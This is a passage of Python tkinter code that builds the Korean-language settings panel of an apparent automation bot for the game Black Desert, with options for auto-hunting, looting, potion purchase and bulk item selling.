variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' '
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'].trace(
'w', lambda *args: self.callback_fix_target_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target')
)
if not lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '타겟 고정을 해제합니다',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' '
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'].trace(
'w', lambda *args: self.callback_migung_invite_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '미궁 초대 자동 수락',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'].trace(
'w', lambda *args: self.callback_migung_invite_rank_op_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op')
)
combobox_list = LYBBlackDesert.migung_rank_op_list
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'].trace(
'w', lambda *args: self.callback_migung_invite_rank_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank')
)
combobox_list = []
for i in range(1, 9):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'] = 4
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = '단계, ≤'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'].trace(
'w', lambda *args: self.callback_migung_invite_rank2_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2')
)
combobox_list = []
for i in range(1, 9):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'] = 6
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = '단계'
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'].trace(
'w', lambda *args: self.callback_hunt_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'period')
)
combobox_list = []
for i in range(60, 100000, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'period' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'period'] = 3600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'],
state = "readonly",
height = 10,
width = 7,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'period'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 동안 자동 사냥 진행 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'].trace(
'w', lambda *args: self.callback_hunt_pet_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period')
)
combobox_list = []
for i in range(0, 3601, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'] = 3600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초마다 반려 동물 체크"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'].trace(
'w', lambda *args: self.callback_complete_sequence_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '퀘스트 완료 무작위 대기 후 클릭(',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "최대"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'].trace(
'w', lambda *args: self.callback_complete_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period')
)
combobox_list = []
for i in range(1, 61):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'],
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초)"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'].trace(
'w', lambda *args: self.callback_loot_box_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '전투의 흔적(탐색 시간 0.5초)',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_box'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "▶ 인식 범위:"
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_COMBAT_BOX_RANGE)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'].trace(
'w', lambda *args: self.callback_box_range_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range')
)
combobox_list = LYBBlackDesert.box_range_list
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'],
state = "readonly",
height = 10,
width = 7,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'box_range'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'].trace(
'w', lambda *args: self.callback_loot_chegwang_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '채광',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chegwang'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'].trace(
'w', lambda *args: self.callback_loot_chejip_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '채집',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_chejip'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'].trace(
'w', lambda *args: self.callback_loot_beolmok_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '벌목',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'loot_beolmok'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame = ttk.Frame(frame_label)
# frame.pack(anchor=tkinter.W, padx=5, side=tkinter.LEFT)
# frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'].trace(
'w', lambda *args: self.callback_jeoljeon_mode_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '절전 모드',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'jeoljeon_mode'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
s = ttk.Style()
s.configure('red_label.TLabel', foreground='red')
label = ttk.Label(
master = frame,
text = "무게 경고가 ",
style = 'red_label.TLabel'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'].trace(
'w', lambda *args: self.callback_muge_percentage_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'] = 70
combobox_list = LYBBlackDesert.muge_percentage_list
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'muge_percentage'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "% 이상일 경우 마을 가기",
style = 'red_label.TLabel'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'].trace(
'w', lambda *args: self.callback_search_complete_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '퀘스트 완료 위아래로 탐색하기',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'search_complete'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='물약 구매')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'].trace(
'w', lambda *args: self.callback_potion_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '물약 구매하기',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "횟수:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'].trace(
'w', lambda *args: self.callback_potion_set_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'] = 10
combobox_list = [10, 50, 100]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_set'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개씩"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'].trace(
'w', lambda *args: self.callback_potion_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'] = 10
combobox_list = []
for i in range(1, 100):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "회"
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "물약 종류:"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'].trace(
'w', lambda *args: self.callback_potion_thing_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing')
)
combobox_list = LYBBlackDesert.potion_list
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_thing'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = " "
)
label.pack(side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "무게가 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'].trace(
'w', lambda *args: self.callback_potion_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'] = 70
combobox_list = []
for i in range(1, 100):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'potion_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "% 이상이면 구매 중지"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='일괄 판매')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'].trace(
'w', lambda *args: self.callback_sell_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '일괄 판매 하기',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "품목분류: "
)
label.pack(side=tkinter.LEFT)
i = 0
for each_pummok in LYBBlackDesert.sell_pummok_list:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + str(i)] = tkinter.BooleanVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '0'].trace(
'w', lambda *args: self.callback_sell_pummok_0_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '0')
)
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '1'].trace(
'w', lambda *args: self.callback_sell_pummok_1_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '1')
)
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '2'].trace(
'w', lambda *args: self.callback_sell_pummok_2_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '2')
)
elif i == 3:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '3'].trace(
'w', lambda *args: self.callback_sell_pummok_3_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '3')
)
elif i == 4:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '4'].trace(
'w', lambda *args: self.callback_sell_pummok_4_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + '4')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + str(i)] = False
check_box = ttk.Checkbutton(
master = frame,
text = self.get_item_rank_text(each_pummok),
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_pummok' + str(i)],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
i += 1
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "등급분류: "
)
label.pack(side=tkinter.LEFT)
i = 0
for each_rank in LYBBlackDesert.item_rank_list:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + str(i)] = tkinter.BooleanVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '0'].trace(
'w', lambda *args: self.callback_sell_item_rank_0_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '0')
)
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '1'].trace(
'w', lambda *args: self.callback_sell_item_rank_1_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '1')
)
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '2'].trace(
'w', lambda *args: self.callback_sell_item_rank_2_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '2')
)
elif i == 3:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '3'].trace(
'w', lambda *args: self.callback_sell_item_rank_3_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '3')
)
elif i == 4:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '4'].trace(
'w', lambda *args: self.callback_sell_item_rank_4_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '4')
)
elif i == 5:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '5'].trace(
'w', lambda *args: self.callback_sell_item_rank_5_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '5')
)
elif i == 6:
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '6'].trace(
'w', lambda *args: self.callback_sell_item_rank_6_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + '6')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + str(i)] = False
s = ttk.Style()
s.configure(each_rank + '.TCheckbutton', foreground=LYBBlackDesert.item_rank_color_list[i])
check_box = ttk.Checkbutton(
master = frame,
text = self.get_item_rank_text(each_rank),
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'item_rank' + str(i)],
style = each_rank + '.TCheckbutton',
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
i += 1
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'].trace(
'w', lambda *args: self.callback_sell_jamjeryoek_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek')
)
if not lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'sell_jamjeryoek'] = False
s = ttk.Style()
s.configure('sell_jamjeryoek.TCheckbutton', foreground='#0367db')
